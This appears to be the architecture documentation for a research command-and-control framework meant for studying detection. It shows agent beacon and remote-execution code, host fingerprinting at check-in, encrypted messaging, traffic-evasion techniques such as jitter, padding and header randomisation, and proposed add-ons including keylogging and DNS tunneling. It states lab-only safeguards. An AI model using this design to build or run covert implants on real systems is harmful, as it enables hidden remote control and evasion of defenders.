Skip to main content

Architecture Overview

The C2 Framework follows a classic client-server architecture with three primary layers: the Agent (client), Transport (communication), and Server (command infrastructure). All communication is encrypted and authenticated using AES-256-GCM.
The framework is designed for research into detection methodologies, not operational use. All components include safety controls and environment validation.

System Components

Agent

Client-side component that runs on target systems, checks into the server, and executes commands

Server

Central C2 server that manages sessions, queues tasks, and stores results

Transport

Encrypted communication layer handling HTTP/HTTPS requests with custom protocol

Common

Shared libraries for cryptography, message formatting, and configuration

Component Architecture

Directory Structure

source/
├── agent/              # Client-side agent components
│   ├── agent_main.py   # Entry point with environment checks
│   ├── beacon.py       # Beacon loop and server communication
│   ├── executor.py     # Safe command execution engine
│   ├── environment_checks.py  # Lab environment validation
│   └── jitter.py       # Timing jitter utilities
├── server/             # Server infrastructure
│   ├── server_main.py  # FastAPI server and beacon endpoint
│   ├── session_manager.py  # Active session tracking
│   ├── command_queue.py    # Task queue management
│   ├── storage.py      # SQLite database interface
│   └── api_interface.py    # Operator API endpoints
├── common/             # Shared components
│   ├── crypto.py       # AES-GCM encryption and key derivation
│   ├── message_format.py   # Protocol serialization
│   ├── config.py       # Configuration management
│   ├── logger.py       # Structured logging
│   └── utils.py        # Error types and helpers
├── transport/          # Communication layer
│   ├── http_transport.py   # HTTP client with TLS pinning
│   ├── tls_wrapper.py      # Custom SSL context
│   └── traffic_profile.py  # Evasion profile loader
├── evasion/            # Traffic evasion techniques
│   ├── sleep_strat.py      # Jitter strategies (uniform/gaussian)
│   ├── padding_strat.py    # Random padding implementation
│   ├── header_randomizer.py # HTTP header randomization
│   └── profile_config.yaml  # Evasion profile definitions
└── telemetry/          # Research instrumentation
    ├── traffic_capture.py  # Network packet capture
    ├── flow_parser.py      # Traffic flow analysis
    └── feature_extractor.py # ML feature extraction

Agent Architecture

The agent is the client-side component that runs on target systems in the lab environment.

Agent Workflow

1

Environment Validation

On startup, the agent runs mandatory environment checks:
# From agent/agent_main.py:9-21
if __name__ == '__main__':
    try:
        check_lab_environment()  # Validates LAB_MODE, allowed hosts, VM status
        BeaconLoop().run()
    except SystemExit:
        raise
    except Exception as e:
        logger.error('catastrophic failure — agent exiting')
        sys.exit(1)
Checks performed:
  • LAB_MODE environment variable must equal ‘1’
  • SERVER_HOST must be in ALLOWED_HOSTS whitelist
  • VM detection (informational, does not block)
  • Debugger detection (warning only)
2

Initial Checkin

Agent sends CHECKIN message with system information:
# From agent/beacon.py:41-49
def _build_checkin_payload() -> dict:
    return mf.build_checkin(
        hostname   = platform.node(),
        username   = getpass.getuser(),
        os_info    = f'{platform.system()} {platform.release()}',
        agent_ver  = AGENT_VERSION,
        jitter_pct = config.JITTER_PCT,
    )
Server responds with assigned session_id UUID.
3

Beacon Loop

Agent enters main loop, periodically polling for tasks:
# From agent/beacon.py:164-213
while True:
    # Compute jittered sleep interval
    sleep_s = self._sleep_fn(
        config.BEACON_INTERVAL_S,
        self._profile.jitter_pct,
    )
    time.sleep(sleep_s)
    
    # Send TASK_PULL
    response = _send(pull_payload, self._key)
    
    if msg_type == mf.MSG_TASK_DISPATCH:
        self._handle_task_dispatch(response)
    elif msg_type == mf.MSG_TERMINATE:
        sys.exit(0)
4

Task Execution

When task is dispatched, execute safely and return results:
# From agent/executor.py:33-101
def execute(task_id: str, command: str, args: list,
            timeout_s: int) -> TaskResult:
    # Blocklist check
    if _is_blocked(command):
        return TaskResult(exit_code=126, stderr='BLOCKED')
    
    # Execute with subprocess.run (shell=False)
    result = subprocess.run(
        [command] + args,
        capture_output = True,
        timeout        = timeout_s,
        shell          = False,  # Prevents command injection
    )
    
    return TaskResult(
        stdout      = result.stdout[:MAX_OUTPUT],
        stderr      = result.stderr[:MAX_OUTPUT],
        exit_code   = result.returncode,
        duration_ms = elapsed_ms,
    )

Agent Components

beacon.py:59-229Core agent logic managing the check-in and polling cycle:Key Features:
  • Exponential backoff on connection failures
  • Jittered sleep intervals for traffic analysis resistance
  • Graceful reconnection on transport errors
  • Session persistence across network issues
Backoff Strategy:
# From agent/beacon.py:23-37
class BackoffManager:
    _SEQUENCE = [1, 2, 4, 8, 16, 32, 60]  # seconds, capped at 60
    
    def compute_delay(self) -> float:
        return float(self._SEQUENCE[min(self.attempts, len(self._SEQUENCE) - 1)])
Prevents rapid reconnection attempts that could trigger detection.

Server Architecture

The server provides the command and control infrastructure, session management, and task orchestration.

Server Components

server_main.py:1-281HTTP server handling all agent communication:
# From server/server_main.py:45-124
app = FastAPI(docs_url=None, redoc_url=None, lifespan=lifespan)

@app.post('/beacon')
async def beacon(request: Request) -> Response:
    # 1. Receive and validate payload size
    raw_body = await request.body()
    if len(raw_body) > MAX_BEACON_SIZE:
        return JSONResponse(status_code=413)
    
    # 2. Unpack and decrypt
    session_key = get_session_key()
    payload = mf.unpack(raw_body, session_key)
    
    # 3. Replay protection
    if not await db.check_and_store_nonce(nonce):
        return JSONResponse(status_code=409, content={'error': 'replay detected'})
    
    # 4. Dispatch by message type
    response_payload = await _dispatch(msg_type, session_id, payload, source_ip)
    
    # 5. Pack and return encrypted response
    packed = mf.pack(response_payload, session_key)
    return Response(content=packed, media_type='application/octet-stream')
Security Features:
  • Size limit enforcement (256KB max)
  • Nonce replay detection
  • Catch-all 404 for non-beacon paths
  • TLS with certificate pinning

Message Dispatch Flow

# From server/server_main.py:128-146
async def _dispatch(msg_type: str, session_id: str,
                    payload: dict, source_ip: str) -> dict | None:
    
    if msg_type == mf.MSG_CHECKIN:
        return await _handle_checkin(payload, source_ip)
    
    if msg_type == mf.MSG_TASK_PULL:
        return await _handle_task_pull(session_id)
    
    if msg_type == mf.MSG_TASK_RESULT:
        return await _handle_task_result(session_id, payload)
    
    if msg_type == mf.MSG_HEARTBEAT:
        return await _handle_heartbeat(session_id)
    
    return None

Communication Protocol

The framework implements a custom binary protocol with authenticated encryption.

Protocol Layers

1

Frame Structure

7-byte header with magic, version, and length:
# From common/message_format.py:20-24
MAGIC            = 0xC2C2
PROTOCOL_VERSION = 0x01
HEADER_FORMAT    = '!HBI'  # big-endian: uint16 + uint8 + uint32
HEADER_SIZE      = 7 bytes
Wire Format:
[ magic:2B | version:1B | length:4B | nonce:12B | ciphertext+tag ]
2

Encryption Layer

AES-256-GCM with HKDF key derivation:
# From common/crypto.py:36-55
def encrypt(plaintext: bytes, key: bytes) -> tuple[bytes, bytes]:
    nonce = os.urandom(NONCE_SIZE_BYTES)  # 12 bytes random
    aesgcm = AESGCM(key)
    ciphertext_with_tag = aesgcm.encrypt(nonce, plaintext, None)
    return ciphertext_with_tag, nonce
Key Derivation:
# From common/crypto.py:17-32
def derive_key(psk: bytes, salt: bytes) -> bytes:
    hkdf = HKDF(
        algorithm=hashes.SHA256(),
        length=KEY_SIZE_BYTES,  # 32 bytes
        salt=salt,
        info=b'c2-framework-v1',
    )
    return hkdf.derive(psk)
3

Padding Layer

Random padding obscures message sizes:
# From evasion/padding_strat.py:8-19
def pad(plaintext: bytes, min_bytes: int, max_bytes: int) -> bytes:
    pad_len   = random.randint(min_bytes, max_bytes)
    pad_bytes = os.urandom(pad_len)
    # 2-byte length prefix + padding + plaintext
    return struct.pack('>H', pad_len) + pad_bytes + plaintext
Padding is applied before encryption, making padded length visible only in ciphertext size.
4

Message Layer

JSON payloads with mandatory fields:
# From common/message_format.py:119-129
def _base_payload(msg_type: str, session_id: str = None) -> dict:
    return {
        'msg_type':   msg_type,
        'session_id': session_id,
        'timestamp':  int(time.time()),
        'nonce':      uuid.uuid4().hex,  # Replay protection
        'payload':    {},
    }

Message Types

CHECKIN

Agent → ServerInitial registration with system info:
{
  'msg_type': 'CHECKIN',
  'payload': {
    'hostname': 'VICTIM-PC',
    'username': 'jdoe',
    'os': 'Windows 10 22H2',
    'agent_ver': '1.0.0',
    'jitter_pct': 20
  }
}

TASK_PULL

Agent → ServerRequest next pending task:
{
  'msg_type': 'TASK_PULL',
  'session_id': 'uuid',
  'payload': {}
}

TASK_DISPATCH

Server → AgentSend task to execute:
{
  'msg_type': 'TASK_DISPATCH',
  'session_id': 'uuid',
  'payload': {
    'task_id': 'uuid',
    'command': 'whoami',
    'args': [],
    'timeout_s': 30
  }
}

TASK_RESULT

Agent → ServerReturn execution results:
{
  'msg_type': 'TASK_RESULT',
  'session_id': 'uuid',
  'payload': {
    'task_id': 'uuid',
    'stdout': 'DOMAIN\\jdoe',
    'stderr': '',
    'exit_code': 0,
    'duration_ms': 142
  }
}

HEARTBEAT

Agent → ServerUpdate last_seen timestamp:
{
  'msg_type': 'HEARTBEAT',
  'session_id': 'uuid',
  'payload': {}
}

TERMINATE

Server → AgentSignal agent shutdown:
{
  'msg_type': 'TERMINATE',
  'session_id': 'uuid',
  'payload': {
    'reason': 'session killed by operator'
  }
}

Evasion Techniques

The framework implements multiple traffic analysis evasion techniques for research purposes.

Evasion Profiles

profile_config.yaml: baselineFixed timing and minimal traffic shaping:
baseline:
  jitter_pct: 0
  strategy: uniform
  padding_min: 0
  padding_max: 0
  header_level: 0
  • No jitter: exactly 30s intervals
  • No padding: payload size reveals message length
  • Fixed headers: Chrome User-Agent only
Use Case: Baseline for detection algorithm testing

Jitter Strategies

Uniform Jitter

Random intervals within ±N% of base:
# From evasion/sleep_strat.py:8-13
def uniform_sleep(base_s: float, jitter_pct: int) -> float:
    delta = base_s * (jitter_pct / 100.0)
    return max(MIN_SLEEP_S, 
               random.uniform(base_s - delta, base_s + delta))
Characteristics:
  • Flat distribution
  • Equal probability across range
  • Easy to detect via histogram analysis

Gaussian Jitter

Normally distributed intervals:
# From evasion/sleep_strat.py:16-21
def gaussian_sleep(base_s: float, jitter_pct: int) -> float:
    sigma = base_s * (jitter_pct / 100.0)
    return max(MIN_SLEEP_S, 
               random.gauss(base_s, sigma))
Characteristics:
  • Bell curve distribution
  • Most intervals near base, some outliers
  • Mimics natural user behavior patterns

Transport Layer

HTTP/HTTPS transport with TLS certificate pinning and custom SSL context.

TLS Implementation

# From transport/http_transport.py:29-41
def _build_session() -> requests.Session:
    cert_path = os.path.abspath(config.TLS_CERT_PATH)
    if not os.path.exists(cert_path):
        raise TransportError(f'TLS cert not found at {cert_path}')
    
    ctx = create_ssl_context(cert_path)
    session = requests.Session()
    session.mount('https://', TLSAdapter(ctx))
    return session
Security Features:
  • Certificate pinning prevents MITM attacks
  • Host whitelist validation before connection
  • 10-second request timeout
  • 64KB response size limit

Host Validation

# From transport/http_transport.py:44-57
def _validate_host(endpoint: str) -> None:
    host = urllib.parse.urlparse(endpoint).hostname
    
    if host not in config.ALLOWED_HOSTS:
        raise TransportError(
            f'host "{host}" is not in ALLOWED_HOSTS {config.ALLOWED_HOSTS}'
        )
Prevents accidental or malicious connection to non-lab hosts.

Data Flow Diagram

Security Architecture

Cryptographic Security

Encryption:
  • AES-256-GCM authenticated encryption
  • HKDF key derivation from pre-shared key
  • Random 12-byte nonces per message
  • 16-byte authentication tags
Replay Protection:
  • UUID nonces in every message
  • Server-side nonce storage and validation
  • 409 Conflict on duplicate nonce

Environment Security

Agent Controls:
  • LAB_MODE environment variable required
  • Host whitelist enforcement
  • Command blocklist (prevents privilege escalation)
  • subprocess with shell=False
Server Controls:
  • Payload size limits (256KB)
  • TLS certificate pinning
  • Catch-all 404 for non-beacon paths
  • Structured audit logging

Performance Characteristics

Message Processing:
  • Pack/unpack: Less than 1ms per message
  • Encryption/decryption: Less than 5ms per message
  • Database operations: Less than 10ms per query
  • End-to-end beacon: 50-200ms typical
Bottlenecks:
  • Network latency (depends on lab topology)
  • SQLite write locks (single writer)
  • Task execution time (command dependent)

Deployment Topology

Typical lab network configuration:
┌─────────────────────────────────────────────────────────────┐
│  Isolated Lab Network (192.168.100.0/24)                    │
│                                                               │
│  ┌──────────────────┐         ┌──────────────────┐         │
│  │  Ubuntu Server   │         │  Windows 10 VM   │         │
│  │  (C2 Server)     │◄────────│  (Agent)         │         │
│  │  192.168.100.10  │  HTTPS  │  192.168.100.20  │         │
│  │                  │  :443   │                  │         │
│  │  - FastAPI       │         │  - Python Agent  │         │
│  │  - SQLite        │         │  - LAB_MODE=1    │         │
│  │  - TLS Cert      │         │  - Blocklist     │         │
│  └──────────────────┘         └──────────────────┘         │
│           ▲                                                  │
│           │                                                  │
│           │                                                  │
│  ┌────────┴─────────┐         ┌──────────────────┐         │
│  │  Operator PC     │         │  Wireshark       │         │
│  │  192.168.100.5   │         │  Traffic Capture │         │
│  │                  │         │  192.168.100.15  │         │
│  │  - CLI Interface │         │  - PCAP files    │         │
│  │  - Task Queue    │         │  - Flow analysis │         │
│  └──────────────────┘         └──────────────────┘         │
│                                                               │
└─────────────────────────────────────────────────────────────┘
         NO EXTERNAL CONNECTIVITY
The lab network must be completely isolated from production networks and the internet. Use physical network separation or VLANs with strict firewall rules.

Extension Points

The framework is designed for research extensibility:

New Evasion Techniques

Add to evasion/ directory:
  • Domain fronting modules
  • DNS tunneling transport
  • Steganographic encoding
  • Custom protocol implementations

Telemetry Collection

Extend telemetry/ components:
  • ML feature extraction
  • Traffic flow analysis
  • Behavioral baselining
  • Detection rule generation

Transport Protocols

Implement alternative channels:
  • WebSocket transport
  • QUIC/HTTP3 protocol
  • Custom binary protocols
  • Multi-hop proxying

Command Modules

Add task execution capabilities:
  • File transfer operations
  • Screenshot capture
  • Keylogging (for research)
  • Network reconnaissance

Next Steps

Setup Guide

Configure the lab environment and deploy framework components

API Reference

Detailed API documentation for all components

Experiments

Run traffic analysis experiments and collect telemetry

Build docs developers (and LLMs) love